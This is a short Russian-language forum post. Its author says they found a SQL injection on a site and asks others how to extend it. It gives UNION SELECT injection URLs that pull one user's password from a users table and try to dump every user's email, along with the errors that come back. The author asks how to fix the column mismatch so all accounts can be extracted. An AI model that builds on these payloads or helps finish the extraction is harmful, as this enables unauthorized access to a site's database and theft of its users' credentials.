Привет %Username%, вопрос в следующем нащупал sql иньекцию, и все впринципе нормально, но есть пару но:
Вытащить могу данные только одного юзверя, если укажу его айди например:
Код:
xxxx.php?wid=1&pid=-1+union+select+password+from +users +where uid =506
получаю пароль: %pass%
Но когда составляю запрос, что бы получить список всех юзверей, например:
Код:
.php?wid=2&pid=-1+union+select+email+from +users + group + by + uid+ desc
На что мне выдает стринг с текстом : Array
Так же проблема выдать комбинированный запрос:
Код:
.php?wid=2&pid=-1+union+select+email,uid+from +users where uid = 808
В ответ The used SELECT statements have a different number of columns
Буду рад просвещению, с иньекциями раньше никогда толком не работал, но вот пришлось.